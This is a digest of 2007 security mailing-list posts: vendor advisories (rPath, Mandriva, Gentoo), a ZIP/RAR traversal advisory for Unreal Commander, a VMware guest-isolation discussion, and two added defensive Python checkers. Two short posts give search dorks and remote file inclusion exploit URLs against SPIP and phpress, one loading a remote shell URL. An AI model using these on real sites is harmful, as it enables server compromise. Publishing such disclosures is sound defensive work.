rPSA-2007-0169-1 xterm
rPath Security Advisory: 2007-0169-1
Published: 2007-08-23
Products: rPath Linux 1
Rating: Major
Exposure Level Classification: Local User Deterministic Unauthorized Access
Updated Versions: xterm=/[EMAIL PROTECTED]:devel//1/202-5.3-1

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2797
    https://issues.rpath.com/browse/RPL-1396

Description:
    Previous versions of the xterm package assigned incorrect ownership and write permissions to pseudo-terminal devices, permitting local users to direct output to other users' xterm sessions. Due to xterm's extensive internal processing of escape sequences, this also permits unauthorized modification of xterm session behavior.

Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[ MDKSA-2007:170 ] - Updated gimp packages fix input data validation issues in several plugins
Mandriva Linux Security Advisory MDKSA-2007:170
http://www.mandriva.com/security/

Package : gimp
Date: August 23, 2007
Affected: 2007.0, 2007.1, Corporate 3.0

Problem Description:

Multiple integer overflows in the image loader plug-ins in GIMP before 2.2.16 allow user-assisted remote attackers to execute arbitrary code via crafted length values in (1) DICOM, (2) PNM, (3) PSD, (4) PSP, (5) Sun RAS, (6) XBM, and (7) XWD files. (CVE-2006-4519)

Integer overflow in the seek_to_and_unpack_pixeldata function in the psd.c plugin in Gimp 2.2.15 allows remote attackers to execute arbitrary code via a crafted PSD file that contains a large (1) width or (2) height value. (CVE-2007-2949)

Victor Stinner has discovered several flaws in file plug-ins using his fuzzyfier tool fusil. Several modified image files cause the plug-ins to crash or consume excessive amounts of memory due to insufficient input validation. Affected plug-ins: bmp, pcx, psd, psp (*.tub). (CVE-2007-3741)

Updated packages have been patched to prevent these issues.
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4519
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2949
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3741
Re: VMWare poor guest isolation design
On Wed, 22 Aug 2007, M. Burnett wrote:

> I have run across a design issue in VMware's scripting automation API that diminishes VM guest/host isolation in such a manner to facilitate privilege escalation, spreading of malware, and compromise of guest operating systems. VMware's scripting API allows a malicious script on the host machine to execute programs, open URLs, and perform other privileged operations on any guest operating system open at the console, without requiring any credentials on the guest operating system. Furthermore, the script can execute programs even if you lock the desktop of the guest OS. For example, if a non-admin user is logged in at the vm host, but logged in to guest operating systems as an administrator, the script running as a non-admin on the host can still execute admin-level scripts on the guests. I obviously did not discover this issue--the API developers provided it as a feature--I am simply pointing out the potential danger, that it was a poor design decision, and that there is a need to establish best practices for virtual machine guest and host isolation.

I don't see this as a serious problem. This is the virtual equivalent of no physical security. If the host OS (or an account within it) is compromised, of course all bets are off when it comes to a virtual machine running within it.

Furthermore, this attack only works if you are running the vmware guest utilities *and* you are currently logged into a GUI desktop running the vmware userland process.

I personally look at this as an issue for Windows. I personally don't install the vmware guest software for my Linux VMs, nor would I log into a GUI as root. For that matter, if you are merely hosting the guest VMs why would you need to ever use the vmware console after installation? Use a network-based access method, making the need for the vmware guest utilities unnecessary. That should be sufficient for all OS'es.

In (not so) short, this attack vector is virtually worthless if reasonable security practices are employed.

--Arthur Corliss
Live Free or Die
X-Diesel Unreal Commander v0.92 (build 573) multiple vulnerabilities
HISPASEC Security Advisory
http://blog.hispasec.com/lab/

Name         : X-Diesel Unreal Commander v0.92 (build 573) multiple vulnerabilities
Class        : Local/Remote multiple directory traversal (Input Validation Error)
Threat level : HIGH
Discovered   : 2007-08-09
Published    : 2007-08-23
Credit       : Gynvael Coldwind
Vulnerable   : 0.92 (build 573), 0.92 (build 565), prior also may be affected

== Abstract ==

Unreal Commander is an award winning freeware file manager for Windows 98/ME/2000/XP/2003/Vista. The application supports multiple archive formats, has a built-in ftp client, and other features.

Unreal Commander fails to check user-supplied input while processing ZIP and RAR archives. A malformed ZIP or RAR file can be used to perform a directory traversal attack and place malware files in a location selected by the attacker. Successful exploitation can lead to a full compromise of the system.

== Details ==

1. ZIP directory traversal

The file name in a ZIP archive in the central directory can be malformed so that it contains upwards directory traversal, for example:

    Something/../../../../../../Program Files/Something/ws2_32.dll

If the user unpacks such an archive, the Unreal Commander will create the file ws2_32.dll in the specified directory, instead of the directory where the user wants to extract it. This may lead to system compromise, especially if the user executes Unreal Commander with admin privileges.

PoC: http://blog.hispasec.com/lab/files/UnrealCommander_PoC_traversal.zip

2. ZIP name spoofing

A ZIP archive contains two places where a file's name is written: Local file header and Central Directory. Unreal Commander displays the file name according to the Central Directory, but extracts the file with the name from the Local File Header. This may misinform the user about the files contained in the archive. This can help an attacker to trick the user into extracting a dangerous file (for example, an .ani file on an unpacked Windows).

PoC: http://blog.hispasec.com/lab/files/UnrealCommander_PoC_spoof.zip

3. ZIP file size heap information leak

If the ZIP has a malformed file size in the file header, then Unreal Commander writes to the file data from the heap. This could allow a potential information leak (ftp passwords ?), but this has not been confirmed.

4. RAR directory traversal

Like point 1, but regarding the RAR format.

== Vendor status and solution ==

The vendor has been informed, but has not yet released a proper patch. The solution is to check if a RAR or ZIP file contains ".." in the names of the files in the archives. It is also advised not to run Unreal Commander with administrative privileges.

== Disclaimer ==

This document and all the information it contains is provided "as is", without any warranty. Hispasec Sistemas is not responsible for the misuse of the information provided in this advisory. The advisory is provided for educational purposes only.

Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.

Copyright (C) 2007 Hispasec Sistemas.

--
Gynvael Coldwind
mailto: [EMAIL PROTECTED]
mailto: [EMAIL PROTECTED]
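The check the advisory recommends for points 1 and 2, written out as an added example (it is not part of the Hispasec advisory or of Unreal Commander): before extracting, compare each entry's Central Directory name with its Local File Header name and reject names that leave the target directory. The function names and the in-memory sample archive are constructed for illustration; only ZIP is covered.

```python
import io
import re
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"   # local file header signature
LOCAL_FIXED_LEN = 30        # fixed part of the local file header


def is_unsafe_name(name):
    """True if a member name could land outside the extraction directory."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or re.match(r"^[A-Za-z]:", norm):
        return True                      # absolute path or drive letter
    return ".." in norm.split("/")       # the '..' check the advisory suggests


def local_header_name(raw, offset):
    """Read the file name stored in the local file header at `offset`."""
    fixed = raw[offset:offset + LOCAL_FIXED_LEN]
    if len(fixed) < LOCAL_FIXED_LEN or fixed[:4] != LOCAL_SIG:
        raise ValueError("no local file header at offset %d" % offset)
    name_len, _extra_len = struct.unpack("<HH", fixed[26:30])
    start = offset + LOCAL_FIXED_LEN
    return raw[start:start + name_len]


def audit_zip(raw):
    """Return (kind, detail) findings for an archive held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        for info in zf.infolist():
            central = info.orig_filename          # name a file manager lists
            enc = "utf-8" if info.flag_bits & 0x800 else "cp437"
            local = local_header_name(raw, info.header_offset).decode(enc, "replace")
            if local != central:
                findings.append(("name-mismatch",
                                 "listed as %r, header says %r" % (central, local)))
            for name in sorted({central, local}):
                if is_unsafe_name(name):
                    findings.append(("traversal", "name %r" % name))
    return findings


def build_sample():
    """Constructed sample: one spoofed name, one traversal name, one clean entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("notes.txt", "harmless")
        zf.writestr("Something/../../../outside/file.txt", "harmless")
        zf.writestr("docs/readme.txt", "harmless")
    # The first occurrence of the name is in the first local header; patching
    # it leaves the Central Directory showing "notes.txt".
    return buf.getvalue().replace(b"notes.txt", b"notes.ani", 1)


if __name__ == "__main__":
    for kind, detail in audit_zip(build_sample()):
        print(kind, detail)
```

An extractor that runs this first can refuse the archive, or at least show the user both names, before any file is written.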
Re: TeamSpeak 2 Server Vulnerabilities?
Dear lehox,

See e.g. http://securityvulns.com/Rdocument6.html

--Wednesday, August 22, 2007, 1:00:47 AM, you wrote to bugtraq@securityfocus.com:

l> Hello,
l> I have heard something about TeamSpeak 2 Server vulnerabilities
l> but never found any full disclosure of it. Does somebody know something
l> about it?
l> Greetings

--
~/ZARAZA
http://securityvulns.com/
SPIP v1.7 Remote File Inclusion Bug
DORK : "/SPIP-v1-7-2/"

Bug in : "SPIP-v1-7r/inc-calcul.php3"

Vuln Code:

    include($squelette_cache);

Exploit :

    http://sitename.com/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://SHELLURL?

Discovered By : Darkdewil[system-eor]
Contact : system-eor[at]hotmail[dot]com
Thx To : Cazanova & fedaiturk & n3twork & codes & by_Ka0s
sPECial THanks to : 1923turk - grup
Reminder: HITBSecConf2007 - Malaysia is less than 2 weeks away
HITBSecConf2007 - Malaysia is a mere 2 weeks away! Organized as a community centric, non-profit effort, HITBSecConf is Asia's largest network security event featuring 4 keynote speakers, 7 tracks of technical training sessions and access to over 30 hours of deep knowledge demos and presentations!

Date: 3rd - 6th September 2007
Venue: Hilton KL Sentral
Time: 0900 - 1800

What's on the menu

- 7 tracks of hands on technical training sessions (3rd & 4th)
- 4 keynote speakers (Mark 'Phiber Optik' Abene, Emmanuel Goldstein, Mikko Hypponen and Lance Spitzner!)
- Lock Picking Village (run by members of TOOOL USA)
- Capture The Flag (team-based hacking competition with 11 teams from around the world confirmed)
- BZFlag Area

Some of the highlight conference presentations:

- Hacking Biometric Systems
- High Security Locks - Illusion or Reality?
- How to 0wn Critical National Infrastructure
- Hacking SCADA
- RDS-TMC Injection: How to Freak Out Your Sat Nav Systems
- Attacking Cisco NAC
- Hacking Hardened and Secured Oracle Servers

PLUS an exclusive presentation on WABISABILABI - The Exploit Marketplace Project by their Director of Strategy, who will be taking questions from the audience and speaking on the purpose of the project and its future plans.

Walk in registrants are accepted and the area where the lock picking village, bzflag competition, zone-h hacking challenge and the capture the flag 'live hacking' competition is being held is FREE AND OPEN TO PUBLIC. So do come and check it out. :)

If you haven't registered yet, there's still time to do so but do note that prices increase after 31st August 2007. For further details, please see:

http://conference.hitb.org/hitbsecconf2007kl/
VMWare poor guest isolation design
I have run across a design issue in VMware's scripting automation API that diminishes VM guest/host isolation in such a manner to facilitate privilege escalation, spreading of malware, and compromise of guest operating systems.

VMware's scripting API allows a malicious script on the host machine to execute programs, open URLs, and perform other privileged operations on any guest operating system open at the console, without requiring any credentials on the guest operating system. Furthermore, the script can execute programs even if you lock the desktop of the guest OS. For example, if a non-admin user is logged in at the vm host, but logged in to guest operating systems as an administrator, the script running as a non-admin on the host can still execute admin-level scripts on the guests.

I obviously did not discover this issue--the API developers provided it as a feature--I am simply pointing out the potential danger, that it was a poor design decision, and that there is a need to establish best practices for virtual machine guest and host isolation.

Background

Virtual machines have become a more integral part of the computing world and are playing an increasing role in IT infrastructures. It is not uncommon to use virtual machines for everything from testing to critical server roles. One benefit of using virtual machines is that it allows you to work with several operating systems on the same machine and provides effective isolation between each operating system.

The VIX API provides an interface to manipulate virtual machines from the host machine. This API is available on any machine with VMware Server or Workstation installed. Certain commands--such as RunProgramInGuest--do require authentication to run commands on a VMware guest OS, but you can instruct them to use the credentials of the user currently logged in at the console. If no user is currently logged in, the command can wait until the next user does log in.

The risk here is that although the guest OS is a separate operating system environment, a script on the host machine can still execute programs in any guest machine without knowing any actual login credentials. This would allow malware to propagate to guest OS's without any additional credentials.

Scenario

Many IT professionals have begun to use virtual machines for critical infrastructure systems. In my own environment I use specialized virtual machines for development and administration. The snapshot features and easy backup capabilities of virtual machines make them convenient for dedicated administrative environments. Since I--as well as many administrators--normally stay logged in to my desktop as a non-admin user, it is convenient to have separate virtual machines for performing administrative functions. I have also done this to gain further isolation so that normal PC activities such as browsing the Internet and reading e-mail do not compromise administrative access to my network.

The problem is that a malicious script running within the context of a regular user on my desktop can run administrator-level scripts on any guest I am currently logged in to. Using Ctrl+Alt+Del to lock the desktop of those machines does not prevent VIX from executing commands on the guest. Even if I log out of each guest machine the malware can just queue the command to run the next time I log in at the console of the guest OS.

Remediation

I contacted VMWare about this issue several months ago and they responded that this was "a very difficult design choice". Their response was that anyone who is able to connect to a guest via the VIX api would also have the capability of accessing the virtual disk files of the machine and compromise the guest that way as well. While that is true, it is also possible to use full disk encryption and other countermeasures that prevent access to a host resulting in compromise of the guests.

Furthermore, being able to automate something is a big deal when it comes to spreading malware. Give me access to any system on a foreign network with user-level credentials and before too long I can acquire full admin access, but for a worm to be able to automate that in seconds is something completely different. But rather than try to argue with VMWare about the severity of the issue, I chose to simply make you all aware that the potential is there and you can decide for yourselves.

Fortunately, there is an undocumented switch to turn this off. In the VMX config file, you can add the following:

    guest.commands.anonGuestCommandsRunAsConsoleUser=FALSE

You can also set this on the host-wide configuration file, so it will override the config setting in every VM.

So with that, I would like to establish a best practice for virtual machine guest/host isolation:

A virtual server host should never provide any mechanism that, by default, allows guest-to-host or host-to-guest access without having to follow standard authentication procedures and protocols for the target operating system.
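One way to audit a set of VMs for the switch named in the post above, as an added example (not code from the post or from VMware). It assumes config files are `key = "value"` lines, that keys can be compared case-insensitively, and that an absent setting leaves the behaviour enabled, as the post describes; the sample VMX contents and VM names are constructed.

```python
import re

# Setting name taken from the post; everything else here is illustrative.
SETTING = "guest.commands.anonGuestCommandsRunAsConsoleUser"

# Matches  key = "value"  or  key = value ; lines starting with '#' are skipped.
_LINE = re.compile(r'^\s*([^#\s=][^=]*?)\s*=\s*"?(.*?)"?\s*$')


def parse_config(text):
    """Return {lowercased key: value}; a later duplicate key wins (assumption)."""
    settings = {}
    for line in text.splitlines():
        match = _LINE.match(line)
        if match:
            settings[match.group(1).lower()] = match.group(2).strip()
    return settings


def switch_is_off(vmx_text, host_text=""):
    """True only when the effective value of the setting is FALSE.

    Per the post, a value in the host-wide configuration overrides the
    per-VM value, so the host file is consulted first.
    """
    key = SETTING.lower()
    host = parse_config(host_text)
    vm = parse_config(vmx_text)
    value = host.get(key, vm.get(key))
    return value is not None and value.lower() == "false"


def exposed_vms(vmx_by_name, host_text=""):
    """Names of VMs where console-user guest commands are still allowed."""
    return sorted(name for name, text in vmx_by_name.items()
                  if not switch_is_off(text, host_text))


# Constructed sample inputs (not real VM configurations).
SAMPLE_VMX = {
    "admin-vm": 'displayName = "admin-vm"\nmemsize = "1024"\n',
    "build-vm": 'displayName = "build-vm"\n' + SETTING + ' = "FALSE"\n',
    "dev-vm": '# test box\n' + SETTING + '=TRUE\n',
}
SAMPLE_HOST = SETTING + ' = "FALSE"\n'

if __name__ == "__main__":
    print("exposed without host-wide setting:", exposed_vms(SAMPLE_VMX))
    print("exposed with host-wide setting:", exposed_vms(SAMPLE_VMX, SAMPLE_HOST))
```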
rPSA-2007-0168-1 rsync
rPath Security Advisory: 2007-0168-1
Published: 2007-08-22
Products: rPath Linux 1
Rating: Major
Exposure Level Classification: Remote User Deterministic Unauthorized Access
Updated Versions: rsync=/[EMAIL PROTECTED]:devel//1/2.6.8-1.1-1

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4091
    https://issues.rpath.com/browse/RPL-1647

Description:
    Previous versions of the rsync package contain multiple buffer-overflow vulnerabilities, possibly allowing remote attackers to execute arbitrary code using maliciously crafted directory names.

Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
phpress 0.2.0 (adisplay.php) Remote File Inclusion
We got the nicest name in the security scene!

Info:
    Script: phpress
    Version: 0.2.0
    Homepage: http://sourceforge.net/projects/phpress/

Details:
    Type: Remote_File_Inclusion
    Dork: allinurl:/phpress/
    Exploit: http://host/phpress/adisplay.php?lang=shell

    Variable lang is not defined

Additional_Information:
    Contact: [EMAIL PROTECTED]
    Website: none yet
[ GLSA 200708-17 ] Opera: Multiple vulnerabilities
Gentoo Linux Security Advisory                           GLSA 200708-17
http://security.gentoo.org/

  Severity: Normal
     Title: Opera: Multiple vulnerabilities
      Date: August 22, 2007
      Bugs: #185497, #188987
        ID: 200708-17

Synopsis
========

Opera contains several vulnerabilities, some of which may allow the execution of arbitrary code.

Background
==========

Opera is a multi-platform web browser.

Affected packages
=================

     Package           /  Vulnerable  /  Unaffected
  1  www-client/opera       < 9.23         >= 9.23

Description
===========

An error known as "a virtual function call on an invalid pointer" has been discovered in the JavaScript engine (CVE-2007-4367). Furthermore, iDefense Labs reported that an already-freed pointer may be still used under unspecified circumstances in the BitTorrent support (CVE-2007-3929). At last, minor other errors have been discovered, relative to memory read protection (Opera Advisory 861) and URI displays (CVE-2007-3142, CVE-2007-3819).

Impact
======

A remote attacker could trigger the BitTorrent vulnerability by enticing a user into starting a malicious BitTorrent download, and execute arbitrary code through unspecified vectors. Additionally, a specially crafted JavaScript may trigger the "virtual function" vulnerability. The JavaScript engine can also access previously freed but uncleaned memory. Finally, a user can be fooled with a too long HTTP server name that does not fit the dialog box, or a URI containing whitespaces.

Workaround
==========

There is no known workaround at this time for all these vulnerabilities.

Resolution
==========

All Opera users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/opera-9.23"

References
==========

  [ 1 ] CVE-2007-3142
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3142
  [ 2 ] CVE-2007-3819
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3819
  [ 3 ] CVE-2007-3929
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3929
  [ 4 ] CVE-2007-4367
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4367
  [ 5 ] Opera Advisory 861
        http://www.opera.com/support/search/view/861/

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200708-17.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[ GLSA 200708-16 ] Qt: Multiple format string vulnerabilities
Gentoo Linux Security Advisory                           GLSA 200708-16
http://security.gentoo.org/

  Severity: Normal
     Title: Qt: Multiple format string vulnerabilities
      Date: August 22, 2007
      Bugs: #185446
        ID: 200708-16

Synopsis
========

Format string vulnerabilities in Qt 3 may lead to the remote execution of arbitrary code in some Qt applications.

Background
==========

Qt is a cross-platform GUI framework, which is used e.g. by KDE.

Affected packages
=================

     Package      /  Vulnerable  /  Unaffected
  1  x11-libs/qt     < 3.3.8-r3     >= 3.3.8-r3

Description
===========

Tim Brown of Portcullis Computer Security Ltd and Dirk Mueller of KDE reported multiple format string errors in qWarning() calls in files qtextedit.cpp, qdatatable.cpp, qsqldatabase.cpp, qsqlindex.cpp, qsqlrecord.cpp, qglobal.cpp, and qsvgdevice.cpp.

Impact
======

An attacker could trigger one of the vulnerabilities by causing a Qt application to parse specially crafted text, which may lead to the execution of arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Qt 3 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose "=x11-libs/qt-3*"

References
==========

  [ 1 ] CVE-2007-3388
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3388

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200708-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5